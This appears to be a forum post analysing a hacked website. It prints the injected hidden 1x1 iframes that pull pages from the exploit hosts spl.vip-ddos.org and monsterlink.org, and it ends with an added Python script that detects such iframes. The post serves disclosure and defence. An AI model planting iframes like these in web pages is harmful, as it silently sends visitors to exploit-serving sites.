This is nasty. There's a lot of virus code tacked on (hacked on):
CODE
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script>
</script>
<script>
</script>
<script>
</script>
<script>
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://monsterlink.org/spl/index.php">
</iframe>
The letters "spl" in those URLs indicate an exploit/trojan/virus. The letters are hacker shorthand for exploit, as they shorten that word to sploit quite often.
The best thing I can do is to point you for information to Dancho Danchev's blog, where he's already posted on this subject. He assigns this work to The New Media Malware Gang, who are related to the Russian Business Network malware group.
NB: The codes don't appear like that on the page; they are hidden inside professionally encrypted JavaScript code.
ETA: I sent an email to searchtimes to let them know about this.
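Added example, not part of the original post: a small Python check a site owner could run over a page to flag cross-host iframes that are 1x1, CSS-hidden, or carry the "spl" marker the post describes. The names `HiddenIframeFinder` and `scan`, the reason labels, and the `.example` hosts in the sample are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collects cross-host iframes that the visitor cannot see."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (line number, iframe host, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        url = urlparse(a.get("src", ""))
        host = url.hostname or ""
        if not host or host == self.page_host:
            return  # relative or same-host frame: out of scope for this check
        style = a.get("style", "").lower().replace(" ", "")
        dims = (a.get("width", ""), a.get("height", ""))
        reasons = []
        if all(re.fullmatch(r"\s*[01]\s*(px)?\s*", d) for d in dims):
            reasons.append("tiny")  # width and height both 0 or 1
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("css-hidden")
        # The post's observation: "spl" as a host label or a path segment.
        if "spl" in host.split(".") or "spl" in url.path.lower().split("/"):
            reasons.append("spl-marker")
        if reasons:
            self.findings.append((self.getpos()[0], host, reasons))


def scan(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings


# Constructed sample page; all hosts are placeholders under .example.
SAMPLE = """<html><body>
<iframe width="560" height="315" src="http://video.example/embed/1"></iframe>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.bad.example/index.php"></iframe>
<iframe width="1" height="1" style="visibility: hidden;" src="http://cdn.bad.example/spl/index.php"></iframe></body></html>"""

if __name__ == "__main__":
    for line, host, reasons in scan(SAMPLE, "www.site.example"):
        print(f"line {line}: {host} [{', '.join(reasons)}]")
```

The post notes that the iframes are hidden inside encoded JavaScript rather than present as plain markup, so run this over the rendered DOM (a headless-browser dump, for instance), not just the raw page source.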